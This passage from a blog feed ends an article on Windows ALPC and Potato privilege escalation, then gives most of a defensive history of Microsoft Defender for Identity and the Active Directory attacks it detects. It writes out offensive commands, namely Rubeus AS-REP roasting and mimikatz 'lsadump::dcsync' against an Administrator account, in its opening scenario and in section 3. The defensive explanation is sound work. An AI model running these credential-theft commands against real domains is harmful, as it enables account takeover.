  { term: &quot;Communication port (ALPC)&quot;, definition: &quot;The unnamed per-connection ALPC port created by &lt;code&gt;NtAlpcAcceptConnectPort&lt;/code&gt;. Exists only as handles in the connecting and accepting processes; not reachable by name.&quot; },
  { term: &quot;Message attribute&quot;, definition: &quot;An optional in-message kernel service: Context, Handle, Security, or View. Each retires an awkward LPC pattern by moving the work into a single ALPC transaction.&quot; },
  { term: &quot;Interface security callback&quot;, definition: &quot;The application-supplied &lt;code&gt;IfCallbackFn&lt;/code&gt; passed to &lt;code&gt;RpcServerRegisterIf2&lt;/code&gt;/&lt;code&gt;RpcServerRegisterIf3&lt;/code&gt;. The kernel cannot inspect or constrain it. NULL is a legal value and means &apos;no callback&apos;.&quot; },
  { term: &quot;Endpoint mapper&quot;, definition: &quot;The well-known LRPC service at &lt;code&gt;\\RPC Control\\epmapper&lt;/code&gt; that translates an interface UUID into the endpoint name a service is listening on. Hosted by &lt;code&gt;rpcss&lt;/code&gt;.&quot; },
  { term: &quot;NDR / NDR64&quot;, definition: &quot;The (Network) Data Representation transfer syntax that MIDL-generated stubs use to marshal RPC arguments. Local LRPC and remote MSRPC use the same wire format.&quot; },
  { term: &quot;SeImpersonatePrivilege&quot;, definition: &quot;Windows user-right that permits a thread to impersonate another security principal via APIs such as &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt;. The privilege the named-pipe-Potato family abuses.&quot; }
]} questions={[
  { q: &quot;Why does the per-connection ALPC communication port have no Object Manager name?&quot;, a: &quot;So that no third party can address the channel. Only the parties that completed the handshake hold the paired handles; the kernel does not expose the unnamed port through any namespace operation. This is the half of Cerrudo&apos;s 2006 structural class the Vista redesign closed.&quot; },
  { q: &quot;Why can the OS not enforce the correctness of an interface security callback?&quot;, a: &quot;The callback is a function pointer into application code. The kernel cannot symbolically execute the function to determine whether its return value is correct, and even if it could, the kernel does not know what &apos;correct&apos; means for an arbitrary application&apos;s authorization policy. Closing the gap requires either a declarative authorization ABI or a sandbox; Microsoft has not publicly committed to either.&quot; },
  { q: &quot;What distinguishes a DCOM-activation Potato from a named-pipe Potato?&quot;, a: &quot;The impersonation primitive. DCOM-activation Potatoes (RoguePotato, JuicyPotato, RottenPotato) use &lt;code&gt;RpcImpersonateClient&lt;/code&gt; inside an LRPC-on-ALPC dispatch path. Named-pipe Potatoes (PrintSpoofer, EfsPotato, PetitPotam) use &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; on a named pipe. The trigger transport (DCOM, RPRN, EFSR) can be shared; the impersonation primitive is what determines which IPC surface the attack exercises.&quot; },
  { q: &quot;What changed in March 2023 for DCOM-activated services?&quot;, a: &quot;KB5004442 phase 3 enabled the DCOM hardening with no override path. &lt;code&gt;RPC_C_AUTHN_LEVEL_PKT_INTEGRITY&lt;/code&gt; is now a mandatory minimum for DCOM activations, and the previously available registry override is removed. The change closed the JuicyPotato variant at the OS-default configuration.&quot; },
  { q: &quot;Where can a defender see ALPC traffic at the per-message level?&quot;, a: &quot;From the &lt;code&gt;Microsoft-Windows-Kernel-ALPC&lt;/code&gt; system ETW provider, enabled in an &lt;code&gt;EVENT_TRACE_SYSTEM_LOGGER_MODE&lt;/code&gt; session. The provider is high-volume; production SOC pipelines rarely subscribe directly and instead rely on EDR vendors that gate the provider behind antimalware-PPL processes.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-internals</category><category>alpc</category><category>lrpc</category><category>ipc</category><category>privilege-escalation</category><category>rpc</category><category>reverse-engineering</category><category>security</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Microsoft Defender for Identity: The Defensive AD Stack That Sees What BloodHound Maps</title><link>https://paragmali.com/blog/microsoft-defender-for-identity-the-defensive-ad-stack-that-/</link><guid isPermaLink="true">https://paragmali.com/blog/microsoft-defender-for-identity-the-defensive-ad-stack-that-/</guid><description>A field guide to Microsoft Defender for Identity, the on-DC sensor and cloud analytics engine descended from Aorato, that fires named alerts on almost every offensive AD primitive in the corpus -- and the five structural blind spots it cannot close.</description><pubDate>Wed, 27 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Microsoft Defender for Identity (MDI) is the cloud-backed, on-DC defensive sensor that watches for almost every offensive Active Directory primitive in the SpecterOps / Mimikatz / Certipy corpus** -- DCSync, DCShadow, Golden / Silver / Diamond ticket forgery, Kerberoasting, AS-REP roasting, NTLM relay, and AD CS abuse -- by parsing Kerberos, NTLM, LDAP, and DRSUAPI on the wire and running per-principal behavioural baselines in a multi-tenant cloud backend. The product began as the Israeli startup Aorato (acquired by Microsoft in November 2014), shipped on-prem as Microsoft ATA in 2015, moved to the cloud as Azure ATP in 2018, was renamed to MDI in 2020, folded into Microsoft Defender XDR at Ignite 2023, and reached its current MDE-integrated v3.x sensor in October 2025. The alert catalogue maps cleanly onto MITRE ATT&amp;amp;CK, and the residual blind spots are knowable: the Credential Guard wall, the Sapphire Ticket&apos;s cryptographic indistinguishability, the encrypted-channel DCSync class, the cross-forest under-instrumentation tail, and legitimate-principal compromise. The operator question in 2026 is not whether MDI detects the attack, but whether the sensor is deployed, the alert was triaged inside the batched-emission window, and the residuals are covered by KQL, Sigma rules, or out-of-band controls.
&lt;h2&gt;1. A Friday Afternoon at the Domain Controller&lt;/h2&gt;
&lt;p&gt;Friday, 14:33. A red-team contractor in conference room C runs &lt;code&gt;Rubeus.exe asreproast&lt;/code&gt; on a corporate laptop she was issued an hour ago. A junior auditor on the fourth floor, working from a desk with read-only Active Directory access, runs &lt;code&gt;bloodhound-python -c All&lt;/code&gt; for a routine quarterly review. A quiet service account on the SQL host in rack 14 runs &lt;code&gt;mimikatz &quot;lsadump::dcsync /domain:contoso.com /user:Administrator&quot;&lt;/code&gt;. The operator at the other end of that session is not on the payroll. Three different workstations. Three different intents. One domain controller on the receiving end of all three.&lt;/p&gt;
&lt;p&gt;The Security Operations Center has not noticed any of them yet. The watcher on the domain controller, however, has. By 14:35 three named alerts are sitting in the Defender XDR queue, each tagged with a MITRE ATT&amp;amp;CK technique ID, each waiting for someone to triage. &lt;em&gt;Suspected AS-REP Roasting attack&lt;/em&gt; (T1558.004) for the Rubeus invocation [@mslearn-mdi-alerts-xdr]. &lt;em&gt;Security principal reconnaissance (LDAP)&lt;/em&gt; for the BloodHound enumeration [@mslearn-mdi-alerts-mdi-classic]. &lt;em&gt;Suspected DCSync attack -- replication of directory services&lt;/em&gt;, External ID 2006, T1003.006, for the Mimikatz call [@mslearn-mdi-alerts-mdi-classic][@mitre-t1003-006]. The watcher is Microsoft Defender for Identity.SOC operators inside Microsoft customers describe this with a stock phrase: &quot;the watcher was already on the DC.&quot; The phrase shows up in incident-response runbooks, vendor training decks, and the Microsoft Defender for Identity Tech Community archive. It captures what is, architecturally, a strange thing -- the defender&apos;s sensor is co-located with the attacker&apos;s target, not perched outside it.&lt;/p&gt;

A Windows Server hosting the Active Directory Domain Services role, responsible for processing Kerberos authentication, NTLM challenges, LDAP queries, and inter-DC directory replication (DRSUAPI) for a domain. Every named MDI runtime alert in this article fires on signal that originates on or transits a domain controller; the deployment model assumes one MDI sensor per DC, plus optional sensors on AD FS, AD CS, and Microsoft Entra Connect servers when those identity roles run on dedicated hosts.
&lt;p&gt;Almost every offensive AD primitive a reader of the SpecterOps, Mimikatz, and Certipy corpus already knows has a runtime alert or a posture assessment shipped by Microsoft on that same DC. &lt;em&gt;Almost&lt;/em&gt; is the load-bearing word. The alert fires only if three things are true: the sensor is deployed on the surface the attack touches, the audit subcategory the alert depends on is enabled, and the SOC opens the Defender XDR incident inside the batched-emission window the cloud backend uses to aggregate signal. This article is about all three conditions, the twelve-year arc that built the watcher, and the structural blind spots no future MDI release will close.&lt;/p&gt;
&lt;p&gt;The watcher was not always on the domain controller. For the first decade of Active Directory, nothing on the DC saw what &lt;a href=&quot;https://paragmali.com/blog/ad-is-a-graph-how-bloodhound-made-defenders-think-like-attac/&quot; rel=&quot;noopener&quot;&gt;BloodHound&lt;/a&gt; today maps. To understand where the watcher came from -- and why its blind spots look the way they do -- we have to start with three founders in Herzliya and a Kerberos forgery presentation in Las Vegas.&lt;/p&gt;
&lt;h2&gt;2. Origins -- Aorato, the Israeli Startup That Became the Watcher&lt;/h2&gt;
&lt;p&gt;August 2014, Black Hat USA. Tal Be&apos;ery and Michael Cherny take the stage with Alva Duckwall and Benjamin Delpy to present &lt;em&gt;&quot;Abusing Microsoft Kerberos: Sorry You Guys Don&apos;t Get It,&quot;&lt;/em&gt; a demonstration that a stolen &lt;a href=&quot;https://paragmali.com/blog/krbtgt-the-account-that-owns-active-directory/&quot; rel=&quot;noopener&quot;&gt;&lt;code&gt;krbtgt&lt;/code&gt;&lt;/a&gt; key lets an attacker mint Kerberos ticket-granting tickets that survive every password rotation in the standard remediation playbook [@blackhat-us14-briefings]. The audience is Active Directory operators who thought their password-reset runbook covered them. By the end of the talk it does not. The startup behind the research is &lt;strong&gt;Aorato&lt;/strong&gt;, three years old, headquartered in Herzliya, Israel. Three months later, Microsoft buys it.&lt;/p&gt;

The credential a Kerberos client receives from the Key Distribution Center (the KDC, which on a Windows network runs on every DC) after successful pre-authentication. The TGT is encrypted with the KDC&apos;s own long-term key -- on Active Directory, the password hash of the `krbtgt` account. Possession of the `krbtgt` hash therefore lets an attacker forge a valid TGT for any principal in the domain, since the KDC has no other way to distinguish a forged ticket from a real one. This forged-ticket class is what MITRE catalogues as T1558.001 Golden Ticket [@mitre-t1558-001].
&lt;p&gt;The Aorato deal closed on &lt;strong&gt;November 13, 2014&lt;/strong&gt;, announced on the Microsoft Official Blog by Takeshi Numoto, then Corporate Vice President of Cloud and Enterprise Marketing [@msblog-aorato]. The post named the central technology Microsoft was acquiring: Aorato&apos;s &lt;em&gt;Organizational Security Graph&lt;/em&gt;, described as &quot;a living, continuously-updated view of all of the people and machines accessing an organization&apos;s Windows Server Active Directory.&quot; Pre-acquisition Microsoft had Azure AD on the cloud side and per-DC event log auditing on the on-prem side, but no first-party behavioural-analytics product over Active Directory. Aorato&apos;s pre-acquisition product, the &lt;em&gt;Directory Services Application Firewall&lt;/em&gt;, did exactly that -- it parsed Kerberos, NTLM, LDAP, and DRSUAPI on the wire and ran per-principal behavioural baselines against the parsed protocol stream. Microsoft wanted that capability inside Windows Server, and inside Office 365.Aorato&apos;s three founders, per the Globes coverage of the acquisition in November 2014, were Idan Plotnik (CEO), Michael Dolinsky (VP R&amp;amp;D), and Ohad Plotnik (VP professional services). Tal Be&apos;ery was VP of Research. A popular reading of the deal names &quot;the Plotnik brothers and Tal Be&apos;ery&quot; as the co-founder trio, which compresses out Dolinsky&apos;s role -- the contemporaneous record names four people, not three [@globes-aorato-2014].&lt;/p&gt;
&lt;p&gt;The product lineage that follows is twelve years long and runs through five names. &lt;strong&gt;Microsoft Advanced Threat Analytics (ATA)&lt;/strong&gt; was announced as generally available on August 27, 2015 (build 1.4.2457, dated August 31, 2015) -- the on-prem productisation of Aorato&apos;s wire-side parser, packaged as a SPAN-mirror appliance (&quot;ATA Gateway&quot;) plus an on-prem analytics server (&quot;ATA Center&quot;) with its own MongoDB-style document store [@mstc-ata-ga][@atadocs-versions]. &lt;strong&gt;Azure ATP&lt;/strong&gt; went GA on March 1, 2018 -- the cloud-side rewrite that kept the on-DC sensor but moved the analytics engine to a multi-tenant cloud backend [@mstc-azureatp-ga][@mstc-azureatp-intro]. &lt;strong&gt;Microsoft Defender for Identity&lt;/strong&gt; was the September 22, 2020 rename announced at Ignite 2020, part of Microsoft&apos;s broader brand consolidation that also rebranded Office 365 ATP to Microsoft Defender for Office 365 and Microsoft Defender ATP to Microsoft Defender for Endpoint [@mssecblog-unified-xdr][@itpro-defender-rebrand][@infusedinnov-names]. The November 2023 Ignite keynote consolidated Microsoft 365 Defender into &lt;strong&gt;Microsoft Defender XDR&lt;/strong&gt; [@virtreview-ignite2023][@handsontek-defender-rebrand]. In October 2025 the &lt;strong&gt;v3.x sensor&lt;/strong&gt; GA folded MDI&apos;s on-DC sensor into the Microsoft Defender for Endpoint agent that organisations were already running on every server [@mslearn-mdi-whats-new][@modernsec-v3x][@jeffreyappel-v2v3]. The May 2026 release notes extended the v3.x sensor to cover AD FS, AD CS, and Microsoft Entra Connect identity roles directly when those roles run on a domain controller, and raised the per-workspace sensor cap from 350 to 1,000 [@mslearn-mdi-whats-new].&lt;/p&gt;

gantt
    title Microsoft Defender for Identity lineage, 2012-2026
    dateFormat YYYY-MM-DD
    axisFormat %Y
    section Aorato
    Aorato startup (DSAF product)        :a1, 2012-01-01, 2014-11-13
    section Microsoft ATA
    ATA initial release SPAN-mirror Gateway :a2, 2015-08-27, 2016-05-01
    ATA 1.6-1.9 Lightweight Gateway      :a3, 2016-05-01, 2018-03-01
    ATA Extended Support window          :a4, 2018-03-01, 2026-01-31
    section Cloud rewrite
    Azure ATP GA                          :a5, 2018-03-01, 2020-09-22
    Microsoft Defender for Identity name :a6, 2020-09-22, 2023-11-15
    section Defender XDR era
    MDI inside Defender XDR (v2.x)        :a7, 2023-11-15, 2025-10-01
    MDI v3.x MDE-integrated sensor        :a8, 2025-10-01, 2026-05-27
&lt;p&gt;Aorato&apos;s pitch in 2014 was that the Windows Security event log -- the thing every SIEM in the world was ingesting -- could not see the attacks an Active Directory operator most needed to catch. To believe that pitch you have to know exactly what the event log misses.&lt;/p&gt;
&lt;h2&gt;3. Why the Event Log Could Not See Golden Tickets&lt;/h2&gt;
&lt;p&gt;Present a Golden Ticket to a domain controller, and the LSA writes a successful event 4769 -- a &lt;a href=&quot;https://paragmali.com/blog/kerberos-in-windows-the-other-half-of-ntlmless/&quot; rel=&quot;noopener&quot;&gt;Kerberos service ticket request&lt;/a&gt;. Present a legitimate ticket from the same principal, and the LSA writes a successful event 4769. Nothing in the event log&apos;s schema, anywhere in any field, distinguishes the two. The ticket is forged with the real &lt;code&gt;krbtgt&lt;/code&gt; key, so the KDC&apos;s signature checks pass. The event log records &lt;em&gt;that an authentication happened&lt;/em&gt;, not &lt;em&gt;whether the ticket presented was genuine&lt;/em&gt;. This is the structural ceiling the SIEM industry could not work around for the first decade of its existence, and it is the gap Aorato was built to close [@mitre-t1558-001][@semperis-golden-ticket].&lt;/p&gt;
&lt;p&gt;The bare-event-log model has three structural failure modes, each of which drove a generation of detection engineering. &lt;strong&gt;Forged-ticket invisibility&lt;/strong&gt; is the first: the LSA logs that an auth happened, but every byte in the 4769 event matches the legitimate case. &lt;strong&gt;Per-DC silo&lt;/strong&gt; is the second: a Kerberos auth against one DC and a follow-up auth against another DC five seconds later sit in two different &lt;code&gt;Security.evtx&lt;/code&gt; files, on two different machines, with no aggregation layer to ask &quot;did the same principal hit ten DCs in five minutes?&quot; &lt;strong&gt;Manual-review throughput collapse&lt;/strong&gt; is the third: a medium-sized forest emits thousands of 4624, 4768, 4769 events per minute per DC, and the human analyst hand-walking them never catches up.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/two-checkmarks-and-the-keys-to-the-kingdom-how-active-direct/&quot; rel=&quot;noopener&quot;&gt;DCSync&lt;/a&gt; makes the first two failure modes vivid. Sean Metcalf&apos;s September 2015 ADSecurity writeup walks through running &lt;code&gt;lsadump::dcsync /domain:contoso.com /user:Administrator&lt;/code&gt; from a workstation: the DC handles the DRSUAPI replication request, the LSA emits a 4662 event for the directory-service-object access, and the attacker walks away with the password hash [@adsec-dcsync].Metcalf&apos;s companion DerbyCon V talk, &lt;em&gt;Red vs. Blue: Modern Active Directory Attacks &amp;amp; Defense&lt;/em&gt; (September 2015), is the canonical operator-grade introduction to the same material [@adsec-dump-ad]. The 4662 event is structurally indistinguishable from a legitimate replication request between two DCs. A SIEM rule that flagged 4662 events whose source IP was not a DC could catch it -- but only if the analyst maintained the IP allowlist (a single Microsoft Entra Connect server in the wrong subnet broke the rule), and only if 4662 was enabled at all (it was high-volume, and many SOCs disabled it to stay under the SIEM&apos;s GB/day licence).&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The SIEM was not failing at Active Directory detection because the rules were wrong. It was failing because the event log -- the data source every SIEM relied on -- could not see what the SIEM needed it to see. Better rules over the same event log would not have closed the gap. Aorato&apos;s contribution was to find a different data source: the wire itself.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Aorato&apos;s three primitives, none of which the SIEM-plus-event-log model had, were: &lt;strong&gt;per-principal behavioural baselines&lt;/strong&gt; so that a long-tail anomaly stood out without anybody writing a rule for it; &lt;strong&gt;on-DC network capture&lt;/strong&gt; so that the ticket structure, the DRSUAPI opnum, and the LDAP search filter were available to detection logic; and &lt;strong&gt;a graph over the directory&lt;/strong&gt; so that the path from compromised workstation to crown-jewel asset could be computed rather than inferred. ATA shipped the first two in 2015. The graph took longer.&lt;/p&gt;
&lt;h2&gt;4. Early Approaches -- ATA 1.x and the Generations That Tried Before&lt;/h2&gt;
&lt;p&gt;By the time Aorato shipped its first product, four prior generations of Active Directory detection had already tried and stalled. Each one could see something the previous generation could not. Each one had a structural ceiling an attacker primitive eventually pushed through. The seven generations that follow are the real spine of the article.&lt;/p&gt;

flowchart LR
    G1[&quot;Gen 1: bare per-DC&lt;br /&gt;event log audit&quot;] --&amp;gt; G2[&quot;Gen 2: SIEM-centralised&lt;br /&gt;events with static rules&quot;]
    G2 --&amp;gt; G3[&quot;Gen 3: first-generation UEBA&lt;br /&gt;over SIEM events&quot;]
    G3 --&amp;gt; G4[&quot;Gen 4: Aorato DSAF and&lt;br /&gt;ATA 1.4-1.5 (SPAN mirror)&quot;]
    G4 --&amp;gt; G5[&quot;Gen 5: ATA 1.6-1.9&lt;br /&gt;(Lightweight Gateway + LMP)&quot;]
    G5 --&amp;gt; G6[&quot;Gen 6: Azure ATP, MDI v1.x-v2.x&lt;br /&gt;(cloud analytics)&quot;]
    G6 --&amp;gt; G7[&quot;Gen 7: MDI v3.x&lt;br /&gt;(MDE-integrated + Identity Explorer)&quot;]
&lt;p&gt;&lt;strong&gt;Generation 1 -- bare per-DC event log auditing (1999-2008)&lt;/strong&gt; was already covered above. It was the only model that existed for the first decade of Active Directory, and its structural ceilings became Aorato&apos;s pitch deck.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 2 -- SIEM-centralised event log ingestion with static correlation rules (2005-2014)&lt;/strong&gt; is the era of ArcSight, Splunk, QRadar, and LogRhythm. Windows Event Forwarder agents on every DC streamed Security event log entries into a central index, and SOC operators wrote rule-based correlation searches in the vendor&apos;s query language. The model gave the SOC cross-DC correlation, a query language, and an audit trail that satisfied PCI-DSS Requirement 10. It did not give the SOC anything new about the data the LSA emitted. Mimikatz&apos;s &lt;code&gt;lsadump::dcsync&lt;/code&gt; was committed to the public Mimikatz repository in March 2015 [@mimikatz-github][@adsec-dcsync]. Sean Metcalf&apos;s longer ADSecurity writeup of the technique followed in September 2015. At commit time, every SIEM in production was correlating DC event logs and not one was emitting a DCSync alert, because the 4662 event was structurally identical to a legitimate DC-to-DC replication.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 3 -- first-generation UEBA on SIEM event data (2013-2017)&lt;/strong&gt; was Securonix, Exabeam, and Splunk UBA. Per-principal behavioural baselines layered on top of the SIEM event index could catch novel TTPs without prior signatures -- a Kerberoasting variant whose SPN list had never been seen before could still trip &quot;this account is requesting an unusual number of service tickets compared to its baseline.&quot; UEBA also closed Generation 2&apos;s per-principal context gap. It did not, however, see ticket structure: a Golden Ticket replayed against ten DCs produces ten successful auths that are behaviourally indistinguishable from the legitimate Domain Admin&apos;s pattern unless the attacker&apos;s source IP or geographic distribution breaks the baseline. This is the &lt;em&gt;legitimate-principal-compromise non-detection class&lt;/em&gt; that survives every defensive generation into 2026.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 4 -- on-wire protocol analytics via off-DC SPAN-mirror Gateway&lt;/strong&gt; is where Aorato&apos;s product, and then Microsoft ATA 1.4 and 1.5, lived. A switch SPAN port mirrored DC traffic to a dedicated ATA Gateway appliance, which ran libpcap-equivalent capture and parsed Kerberos AS-REQ / TGS-REQ / AP-REQ, NTLM challenges, LDAP searches, and DRSUAPI replication calls. Parsed events streamed to the on-prem ATA Center, which ran detection logic and surfaced alerts in a web console [@mstc-ata-ga]. The wire-side parse closed Generation 1-3&apos;s biggest blind spot: ticket structure was finally visible. The SPAN-port operational tax killed the architecture in nine months. Many enterprises could not provision a SPAN mirror. Virtualised DCs on shared hypervisors had no equivalent of a physical SPAN. And the security review of &quot;all DC traffic now mirrors to this appliance&quot; was non-trivial.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 5 -- ATA 1.6 Lightweight Gateway through ATA 1.9 (May 2016 to March 2020)&lt;/strong&gt; moved the Gateway in-process onto the DC itself. ATA 1.6 (May 2016) introduced the Lightweight Gateway with dynamic resource management that capped the sensor&apos;s CPU and memory footprint and let the sensor consume events locally rather than via mirrored network traffic [@mslearn-ata-1-6]. ATA 1.7 (August 31, 2016) added Role-Based Access Control for the ATA Console, Windows Server Core support, and detection of reconnaissance through directory-services enumeration [@mssupport-ata-1-7][@atadocs-versions]. &lt;strong&gt;ATA 1.8 (June 30, 2017; announced July 26, 2017)&lt;/strong&gt; shipped behavioural-brute-force detection, a Golden Ticket lifetime detector, and the abnormal-modification-of-sensitive-groups alert [@mslearn-ata-1-8][@mstc-ata-1-8][@ataversions-1-8-availability]. &lt;strong&gt;ATA 1.9 (March 21, 2018)&lt;/strong&gt; shipped both the entity-profile lateral-movement-aware view and the &lt;em&gt;Lateral movement paths to sensitive accounts&lt;/em&gt; report [@mslearn-ata-1-9][@atadocs-versions][@atadocs-lmp-usecase].A widespread reading of the ATA timeline anchors LMP to ATA 1.7 in late 2017. The primary record contradicts this on both date and feature: ATA 1.7 shipped on August 31, 2016 per the Microsoft Support KB and the ATA-versions table, and the 1.7 release notes do not mention Lateral Movement Paths. Neither do the 1.8 release notes -- LMP first appears in ATA 1.9 (March 21, 2018), which introduced both the entity-profile lateral-movement view and the full Lateral movement paths to sensitive accounts report in the same release [@mssupport-ata-1-7][@atadocs-versions][@mslearn-ata-1-8][@mslearn-ata-1-9].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A popular framing of the LMP timeline says &quot;Microsoft adopted BloodHound-style graph attack paths in 2022.&quot; The primary sources contradict this. Graph-anchored attack-path evaluation in Microsoft&apos;s defensive stack originates in &lt;strong&gt;ATA 1.9 (March 2018)&lt;/strong&gt;, not in any 2022 adoption event. What did happen in 2022 was the start of the deprecation arc for the SAM-R-based discovery the LMP graph depended on, which culminated in Message Center notice &lt;strong&gt;MC1073068 in May 2025&lt;/strong&gt; when Microsoft disabled SAM-R-based local-administrators collection across MDI tenants [@handsontek-mc1073068]. The 2022 date that lingers in operator memory is the &lt;em&gt;deprecation&lt;/em&gt; anchor, not the adoption anchor.&lt;/p&gt;
&lt;/blockquote&gt;

An attack chain through Active Directory in which a non-sensitive account whose credentials are exposed on one workstation can be used to authenticate to a second workstation where a sensitive account&apos;s credentials are cached, which in turn can be used to reach a third workstation, and so on until a Domain Admin or comparable target is reached. ATA 1.9&apos;s Lateral Movement Paths report was the first graph-anchored defensive surface that computed the chain in advance; the report was populated by SAM-R queries that enumerated each host&apos;s local-administrators group. Microsoft disabled the SAM-R-based collection in May 2025 (MC1073068), and the post-LMP graph layer migrated to the Defender XDR hunting graph plus the April 2026 Identity Explorer preview.
&lt;p&gt;The limitation that drove Generation 5 into Generation 6 was the on-prem ATA Center&apos;s release cadence. Benjamin Delpy and Vincent Le Toux disclosed &lt;strong&gt;DCShadow&lt;/strong&gt; at BlueHat IL 2018 in January 2018 -- the technique of registering a rogue domain controller via &lt;code&gt;nTDSDSA&lt;/code&gt; object creation plus SPN registration, then pushing arbitrary updates into AD via legitimate DRSUAPI replication that the event log records as ordinary inter-DC traffic [@dcshadow-com][@mitre-t1207]. ATA 1.9 shipped two months later, in March 2018, with no DCShadow detection. Azure ATP -- the cloud-side rewrite, also GA in March 2018 -- shipped paired alerts External ID 2028 (&lt;em&gt;Suspected DCShadow attack -- domain controller promotion&lt;/em&gt;) and External ID 2029 (&lt;em&gt;Suspected DCShadow attack -- domain controller replication request&lt;/em&gt;) &lt;strong&gt;five months later, in July 2018&lt;/strong&gt; [@mslearn-mdi-alerts-mdi-classic][@mslearn-mdi-whats-new-archive]. The on-prem release cadence could not have closed that five-month gap. The cloud rewrite was the structural answer.&lt;/p&gt;
&lt;h2&gt;5. The Breakthrough -- Azure ATP and the Inverted Data Path&lt;/h2&gt;
&lt;p&gt;If the wire was the right data layer, the cloud was the right place to run the analytics. That is the architectural decision Azure ATP committed to in March 2018, and it is what distinguishes the Microsoft defensive product from every prior generation. The on-DC sensor stayed on the DC. The analytics engine moved.&lt;/p&gt;
&lt;p&gt;Four architectural shifts followed. &lt;strong&gt;First&lt;/strong&gt;, the on-DC sensor became a thin parser. Sensors no longer hosted detection logic; they captured the Kerberos / NTLM / LDAP / DRSUAPI traffic, parsed it into a stream of structured events, and shipped the stream upstream. &lt;strong&gt;Second&lt;/strong&gt;, the data path inverted. Generation 4 sent unparsed packets from the wire to the off-DC Gateway, which parsed them and stored them on-prem; Azure ATP sent parsed events from the on-DC sensor upstream to a multi-tenant cloud backend that ran detection logic and wrote alerts back into a tenant-specific workspace. &lt;strong&gt;Third&lt;/strong&gt;, per-principal behavioural baselines accumulated centrally rather than per-DC, so a baseline survived DC reboots, sensor restarts, and migrations across data centres. &lt;strong&gt;Fourth&lt;/strong&gt;, identity signal joined endpoint and email signal in the same incident queue once Azure ATP folded into Microsoft 365 Defender -- the cross-product correlation that no on-prem product had ever offered [@mstc-azureatp-ga][@mstc-azureatp-intro][@mslearn-xdr-overview].&lt;/p&gt;
&lt;p&gt;Then came the brand-and-architecture history every operator has to know to read a 2026 runbook. The &lt;strong&gt;September 22, 2020&lt;/strong&gt; rename from Azure Advanced Threat Protection to Microsoft Defender for Identity was a brand consolidation, not an architecture change -- the same sensor, the same alerts, the same workspace [@mssecblog-unified-xdr]. The legacy &lt;code&gt;portal.atp.azure.com&lt;/code&gt; standalone portal was &lt;strong&gt;retired on June 30, 2023&lt;/strong&gt; via Message Center notice MC567494, with all requests automatically redirected to &lt;code&gt;security.microsoft.com&lt;/code&gt; [@handsontek-mc567494][@mslearn-mdi-portal]. The &lt;strong&gt;November 15, 2023&lt;/strong&gt; Ignite keynote renamed Microsoft 365 Defender to Microsoft Defender XDR (Message Center MC696570) [@handsontek-defender-rebrand][@virtreview-ignite2023]. Again a brand change, again not an architecture change: the sensors stayed on the DC, the analytics stayed in the cloud, and the KQL schema -- &lt;code&gt;IdentityLogonEvents&lt;/code&gt;, &lt;code&gt;IdentityQueryEvents&lt;/code&gt;, &lt;code&gt;IdentityDirectoryEvents&lt;/code&gt; -- stayed the same [@mslearn-xdr-identitylogon][@mslearn-xdr-identityquery][@mslearn-xdr-identitydirectory].The legacy &lt;code&gt;portal.atp.azure.com&lt;/code&gt; URL is worth remembering because runbooks and SOAR rules from 2018 to 2023 frequently hard-coded it. Any rule that referenced the old portal needs an update; the redirect handles browser traffic but not API calls.&lt;/p&gt;
&lt;p&gt;What the sensor actually feeds into the cloud backend, in 2026, is four data-input layers, ordered roughly by evidence strength. &lt;strong&gt;First&lt;/strong&gt;, the Windows Security event log -- the audit subcategories that the MDI event-collection page lists as required, including &lt;em&gt;Audit Credential Validation&lt;/em&gt;, &lt;em&gt;Audit Kerberos Authentication Service&lt;/em&gt;, &lt;em&gt;Audit Kerberos Service Ticket Operations&lt;/em&gt;, &lt;em&gt;Audit Directory Service Access&lt;/em&gt;, and &lt;em&gt;Audit Computer Account Management&lt;/em&gt; among others [@mslearn-mdi-event-collection]. These are public, documented, and easy to verify with &lt;code&gt;auditpol /get /category:*&lt;/code&gt;. &lt;strong&gt;Second&lt;/strong&gt;, on-DC network capture of Kerberos, NTLM, LDAP, and DRSUAPI -- well-documented because the sensor&apos;s network requirements are part of the public deployment guide. &lt;strong&gt;Third&lt;/strong&gt;, &lt;a href=&quot;https://paragmali.com/blog/etw-how-windows-2000s-performance-hack-became-the-edr-substr/&quot; rel=&quot;noopener&quot;&gt;Event Tracing for Windows&lt;/a&gt; providers that the sensor subscribes to in order to get signal the event log does not surface. &lt;strong&gt;Fourth&lt;/strong&gt;, AD CS audit-log subscriptions added with the AD CS sensor release in August 2023 [@mstc-adcs-sensor][@dirteam-sander-aug2023].&lt;/p&gt;

Microsoft has never published the canonical list of Event Tracing for Windows providers that the MDI sensor subscribes to. Any specific list of providers a reader encounters traces back to community reverse-engineering: Synacktiv&apos;s *A primer on Microsoft Defender for Identity* by Guillaume Andre and Mickael Benassouli (November 2022) is the canonical operator-research primary [@synacktiv-primer-mdi][@synacktiv-primer-mdi-archive]. The methodological precedent is Olaf Hartong&apos;s *Microsoft Defender for Endpoint Internals* series, specifically the 0x02 entry on audit settings and telemetry, which documents the binary-side enumeration approach: run Matt Graeber&apos;s Get-TraceLoggingMetadata script against the sensor executable to enumerate the providers it registers, then use Sealighter to trace those providers to a file for further analysis [@falconforce-mde-0x02][@gist-tracelogging-metadata][@github-sealighter]. Hartong&apos;s 0x02 article reports &quot;roughly 111 public and MDE-exclusive providers used&quot; by MsSense.exe -- the MDI sensor binary is amenable to the same technique, and the provider mix differs (MDI subscribes heavily to LDAP, Kerberos, DRSUAPI, and SAM-R-class providers; MDE subscribes heavily to process, file, network, and image-load providers) but the methodology is shared [@falconforce-mde-0x03][@github-olafhartong]. Read any community-published MDI provider list as a snapshot of what the community has reverse-engineered, not as Microsoft-published ground truth.

